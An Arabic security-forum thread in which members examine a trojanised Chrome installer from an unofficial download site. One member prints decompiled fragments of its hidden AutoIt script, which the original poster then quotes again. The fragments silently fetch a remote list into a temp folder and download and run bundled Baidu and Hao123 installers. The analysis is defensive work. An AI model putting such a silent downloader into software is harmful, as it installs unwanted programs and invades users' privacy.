متصفح الكروم .. للفحص ..

[المقدم بو همام]

السلام عليكم أخواني الزيزومين
عسى من الله أن يكون الجميع بخير
اليوم لقد حملت من احد المواقع العربية لتحميل البرامج
متصفح الكروم .. و عندما بدأت بتثبيته أظهر لي الكمودو تنبيه أنه ليس موقع رقميا
فقلت في نفسي لنرى ماهذا المتصقح وباشرت التنصيب
وبعد الأنتهاء بالفعل ظهر متصفح الكروم
لكن وجدت ملف اسمه إنديكس يعمل في الخلفية فقتلت العملية و فحصته على الفايروس توتل
وبالفعل يوجد إصابات
أترككم مع المتصفح للفحص و التحليل
[hide]

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

[/hide]

ودي و احترامي لكم جميعا

 

[أبو رمش]

و عليكم السلام و رحمة الله و بركاته ..
بعد اكتمال التحميل و فحصه بالبتد فيندر ...

 

[كمال احمد]

انا متعود على عينات اقل من 2 ميجا

40 ميجا تحتاج ساعة لتحميلها وساعة لفحصها وساعة لرفع التقرير وقتها يكون الموضوع : مغلق لانتهاء الغرض منه




النت عندي صاروووخ >>>> اخاف تتطاير اجزاء الملف من السرعة الصاروخية للتحميل وابتلش في اعادة ترتيبها

 

[أبو رمش]

ههههههههههههه
الله يستر من السرعة اخاف تطيرنا مع الملف ..

 

[المقدم بو همام]

و عليكم السلام و رحمة الله و بركاته ..
بعد اكتمال التحميل و فحصه بالبتد فيندر ...

دائما البيت دفيندر بالمرصاد شكرا أخي أبو رمش

انا متعود على عينات اقل من 2 ميجا

40 ميجا تحتاج ساعة لتحميلها وساعة لفحصها وساعة لرفع التقرير وقتها يكون الموضوع : مغلق لانتهاء الغرض منه




النت عندي صاروووخ >>>> اخاف تتطاير اجزاء الملف من السرعة الصاروخية للتحميل وابتلش في اعادة ترتيبها

مرورك يكفي أخي أحمد

 

[أبو رمش]

العفو أخي أبو همام ...

 

[hitman samir12]

سمعة الملف وهو غير موثوق به

بعد فحص الملف تم حذفه من الكاسبر

الملف عبارة عن تروجان

 

[prince.egy]

لا انصح بتحميل اى برنامج الا من موقعه الرسمى حتى لو يحتاج تفعيل حمل البرنامج من موقعه الرسمى واستعمل التفعيل اللى معك

 

[m0d!s@r7@n]

البرنامج مدمج مع اسكربت اوتوات (index file)

 

[المقدم بو همام]

البرنامج مدمج مع اسكربت اوتوات (index file)

شكرا لك اخي لكن مالذي يفعله السكربت بالنظام ؟؟
أعني ماهي ترجمة أوامر السكربت
هل يقوم بتثبيت برنامج ما من موقع
[hide]

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

[/hide]

 

[alaqsa-a]

السلام عليكم

اخي الكريم بداية بارك الله فيك

انا ضد تحميل اي برنامج من غير موقعه الاصلي

وخصوصا اذا كان مجاني

الشركه اموفرته الك وبتحكيلك تعال حمل بتروح بتحمله من مكان ثاني

الله اعلم فيه هو سليم ولا ملغم ولا معدل عليه

حتى وصل معي الامر اذا برنامج مرفق معه سيريل مضغوط في مجلد واحد

بحمله من اجل ان احصل ع السيريل

واقوم بتحميل البرنامج مرة ثانيه من موقعه الاصلي

هذا راي

وشكرا لك اخي

 

[Mr.AzOz]

النود ..

اما بالفحص لاشيء !

 

[المقدم بو همام]

السلام عليكم

اخي الكريم بداية بارك الله فيك

انا ضد تحميل اي برنامج من غير موقعه الاصلي

وخصوصا اذا كان مجاني

الشركه اموفرته الك وبتحكيلك تعال حمل بتروح بتحمله من مكان ثاني

الله اعلم فيه هو سليم ولا ملغم ولا معدل عليه

حتى وصل معي الامر اذا برنامج مرفق معه سيريل مضغوط في مجلد واحد

بحمله من اجل ان احصل ع السيريل

واقوم بتحميل البرنامج مرة ثانيه من موقعه الاصلي

هذا راي

وشكرا لك اخي

بالفعل أخي أنا معك في هذا الأمر

النود ..

اما بالفحص لاشيء !

هل من أحد يستطيع أن يعلم ماذا يفعل السكربت المدمج مع المتصفح

 

[tiktoshitiktoshi is verified member.]

نتيجة الفحص

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

 

[المقدم بو همام]

نتيجة الفحص

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

وهذه نتيجة فحص ملف الإنديكس المدمج مع المتصفح

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

 

[m0d!s@r7@n]

وهذه نتيجة فحص ملف الإنديكس المدمج مع المتصفح

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

 

[المقدم بو همام]

مشاهدة المرفق 65525

مشاهدة المرفق 65526

بارك الله بك أخي

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

 

[MagicianMiDo32]

الملف يقوم بتحميل ملفات المتصفح من هنا
[hide]

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

[/hide]


الملف يقوم بتحميل أكواد من هذا الموقع
[hide]

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

[/hide]
ويقوم بتحميلها وتنفيذها لتثبيت برنامج البايدو وبرامج أخرى تجسسية
[hide]
1753
7$bdMiniDownloaderEG_MENAON-Mini_32_3313.exe$111111$

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

Start=1$Baidu Spark Browser
9$PC_Faster_Setup_Mini_E77_S.exe$111111$

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

/NOTRAY$Baidu PC Faster
8$hao123armenona_ar.exe$111111$

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

$Hao123-Client


[/hide]
كود الاستدعاء
[hide]
$temp_folder_d = Random(0, 22, 3)
DirCreate(@TempDir & "\" & $temp_folder_d)
$link = "

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

" & getplace_id()
Local $sname = Random(0, 22, 3) & ".txt"
Local $sfilepath = @TempDir & "\" & $temp_folder_d & "\" & $sname
Local $ibytessize = InetGet($link, $sfilepath, $inet_forcereload)
$file = @TempDir & "\" & $temp_folder_d & "\" & $sname
FileOpen($file, 0)
For $i = 1 To _filecountlines($file)
If $i = 1 Then
$line = FileReadLine($file, $i)
donwloadtheupdater($line)
Local $installed_programs_array = StringSplit($line, "$")
If IsArray($installed_programs_array) Then
For $i2 = 6 To $installed_programs_array[0]

[/hide]
ويقوم بإنزال ملفات في التيمب
[hide]DirRemove(@TempDir & "\" & $temp_folder_d, 1)[/hide]

[hide]
Func path($value)
If $value = "@TempDir" Then
$value = @TempDir
EndIf
If $value = "@AppDataCommonDir" Then
$value = @AppDataCommonDir
EndIf
If $value = "@DesktopCommonDir" Then
$value = @DesktopCommonDir
EndIf
If $value = "@AppDataDir" Then
$value = @AppDataDir
EndIf
If $value = "@DesktopDir" Then
$value = @DesktopDir
EndIf
If $value = "@FavoritesCommonDir" Then
$value = @FavoritesCommonDir
EndIf
If $value = "@FavoritesDir" Then
$value = @FavoritesDir
EndIf
If $value = "@HomeDrive" Then
$value = @HomeDrive
EndIf
If $value = "@HomePath" Then
$value = @HomePath
EndIf
If $value = "@HomeShare" Then
$value = @HomeShare
EndIf
If $value = "@LocalAppDataDir" Then
$value = @LOCALAPPDATADIR
EndIf
If $value = "@MyDocumentsDir" Then
$value = @MyDocumentsDir
EndIf
If $value = "@ProgramFilesDir" Then
$value = @ProgramFilesDir
EndIf
If $value = "@ProgramsCommonDir" Then
$value = @ProgramsCommonDir
EndIf
If $value = "@ProgramsDir" Then
$value = @ProgramsDir
EndIf
If $value = "@ScriptDir" Then
$value = @ScriptDir
EndIf
If $value = "@ScriptFullPath" Then
$value = @ScriptFullPath
EndIf
If $value = "@SystemDir" Then
$value = @SystemDir
EndIf
If $value = "@UserProfileDir" Then
$value = @UserProfileDir
EndIf
If $value = "@WindowsDir" Then
$value = @WindowsDir
EndIf
If $value = "@WorkingDir" Then
$value = @WorkingDir
EndIf
If $value = "@UserProfileDir" Then
$value = @UserProfileDir
EndIf
Return $value
EndFunc
[/hide]

وإضافة قيم ريجستري
[hide]

Func getplace_id()
Local $place_id = RegRead("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "SM_Games_pl")
If $place_id = "" Then
$place_id = "1"
Else
$place_id = $place_id
EndIf
Return $place_id
EndFunc
[/hide]

واضح من التسمية أنه Rogue SoftWare
أي أنه خطير"برنامج دعائي يخترق خصوصية المستخدم بشكل كبير"

 

[أبو رمش]

و الله شكله يعمل بلاوي ..
جربت افتح الروابط اللي وضعتها في مشاركتك جميعها حجبها البتد فيندر !

 

[المقدم بو همام]

الملف يقوم بتحميل ملفات المتصفح من هنا
[hide]

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

[/hide]


الملف يقوم بتحميل أكواد من هذا الموقع
[hide]

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

[/hide]
ويقوم بتحميلها وتنفيذها لتثبيت برنامج البايدو وبرامج أخرى تجسسية
[hide]
1753
7$bdMiniDownloaderEG_MENAON-Mini_32_3313.exe$111111$

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

Start=1$Baidu Spark Browser
9$PC_Faster_Setup_Mini_E77_S.exe$111111$

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

/NOTRAY$Baidu PC Faster
8$hao123armenona_ar.exe$111111$

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

$Hao123-Client


[/hide]
كود الاستدعاء
[hide]
$temp_folder_d = Random(0, 22, 3)
DirCreate(@TempDir & "\" & $temp_folder_d)
$link = "

يجب عليك تسجيل الدخول او تسجيل لمشاهدة الرابط المخفي

" & getplace_id()
Local $sname = Random(0, 22, 3) & ".txt"
Local $sfilepath = @TempDir & "\" & $temp_folder_d & "\" & $sname
Local $ibytessize = InetGet($link, $sfilepath, $inet_forcereload)
$file = @TempDir & "\" & $temp_folder_d & "\" & $sname
FileOpen($file, 0)
For $i = 1 To _filecountlines($file)
If $i = 1 Then
$line = FileReadLine($file, $i)
donwloadtheupdater($line)
Local $installed_programs_array = StringSplit($line, "$")
If IsArray($installed_programs_array) Then
For $i2 = 6 To $installed_programs_array[0]

[/hide]
ويقوم بإنزال ملفات في التيمب
[hide]DirRemove(@TempDir & "\" & $temp_folder_d, 1)[/hide]

[hide]
Func path($value)
If $value = "@TempDir" Then
$value = @TempDir
EndIf
If $value = "@AppDataCommonDir" Then
$value = @AppDataCommonDir
EndIf
If $value = "@DesktopCommonDir" Then
$value = @DesktopCommonDir
EndIf
If $value = "@AppDataDir" Then
$value = @AppDataDir
EndIf
If $value = "@DesktopDir" Then
$value = @DesktopDir
EndIf
If $value = "@FavoritesCommonDir" Then
$value = @FavoritesCommonDir
EndIf
If $value = "@FavoritesDir" Then
$value = @FavoritesDir
EndIf
If $value = "@HomeDrive" Then
$value = @HomeDrive
EndIf
If $value = "@HomePath" Then
$value = @HomePath
EndIf
If $value = "@HomeShare" Then
$value = @HomeShare
EndIf
If $value = "@LocalAppDataDir" Then
$value = @LOCALAPPDATADIR
EndIf
If $value = "@MyDocumentsDir" Then
$value = @MyDocumentsDir
EndIf
If $value = "@ProgramFilesDir" Then
$value = @ProgramFilesDir
EndIf
If $value = "@ProgramsCommonDir" Then
$value = @ProgramsCommonDir
EndIf
If $value = "@ProgramsDir" Then
$value = @ProgramsDir
EndIf
If $value = "@ScriptDir" Then
$value = @ScriptDir
EndIf
If $value = "@ScriptFullPath" Then
$value = @ScriptFullPath
EndIf
If $value = "@SystemDir" Then
$value = @SystemDir
EndIf
If $value = "@UserProfileDir" Then
$value = @UserProfileDir
EndIf
If $value = "@WindowsDir" Then
$value = @WindowsDir
EndIf
If $value = "@WorkingDir" Then
$value = @WorkingDir
EndIf
If $value = "@UserProfileDir" Then
$value = @UserProfileDir
EndIf
Return $value
EndFunc
[/hide]

وإضافة قيم ريجستري
[hide]

Func getplace_id()
Local $place_id = RegRead("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "SM_Games_pl")
If $place_id = "" Then
$place_id = "1"
Else
$place_id = $place_id
EndIf
Return $place_id
EndFunc
[/hide]

واضح من التسمية أنه Rogue SoftWare
أي أنه خطير"برنامج دعائي يخترق خصوصية المستخدم بشكل كبير"

بارك الله بك أخي ميدو على شرح أكواد السكربت ... بالفعل شكله خطير جدا